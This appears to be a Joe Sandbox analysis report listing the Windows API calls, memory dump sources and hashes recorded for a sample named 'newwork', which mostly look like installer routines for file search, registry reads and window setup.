                                                                                        • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                        • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                        • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                        • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                        • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                        • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                        • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                        • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                        • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                        APIs
                                                                                        • GetMenu.USER32(00000000), ref: 00421361
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu
                                                                                        • String ID:
                                                                                        • API String ID: 3711407533-0
                                                                                        • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                        • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                        • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                        • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$CallMessageProcSendTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 601730667-0
                                                                                        • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                        • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                        • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                        • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0042311E
                                                                                        • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceEnumFontsRelease
                                                                                        • String ID:
                                                                                        • API String ID: 2698912916-0
                                                                                        • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                        • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                        • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                        • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 730355536-0
                                                                                        • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                        • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                        • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                        • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                        APIs
                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                        • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                        Strings
                                                                                        • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                        • NumRecs range exceeded, xrefs: 0045C396
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlush
                                                                                        • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                        • API String ID: 3593489403-659731555
                                                                                        • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                        • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                        • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                        • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                        APIs
                                                                                          • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                          • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                          • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                          • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                          • Part of subcall function 004063C4: 6F551CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                          • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                          • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                          • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                          • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                          • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                          • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                          • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                          • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                          • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                          • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                          • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                          • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                          • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                          • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                          • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                          • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                        • String ID: Setup
                                                                                        • API String ID: 3870281231-3839654196
                                                                                        • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                        • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                        • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                        • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID: $=H
                                                                                        • API String ID: 3660427363-3538597426
                                                                                        • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                        • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                        • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                        • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID: .tmp
                                                                                        • API String ID: 1375471231-2986845003
                                                                                        • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                        • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                        • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                        • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                        APIs
                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                          • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                          • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                        • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                        • API String ID: 3869789854-2936008475
                                                                                        • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                        • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                        • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                        • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: RegisteredOrganization$RegisteredOwner
                                                                                        • API String ID: 3535843008-1113070880
                                                                                        • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                        • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                        • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                        • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateErrorFileHandleLast
                                                                                        • String ID: CreateFile
                                                                                        • API String ID: 2528220319-823142352
                                                                                        • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                        • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                        • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                        • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                        APIs
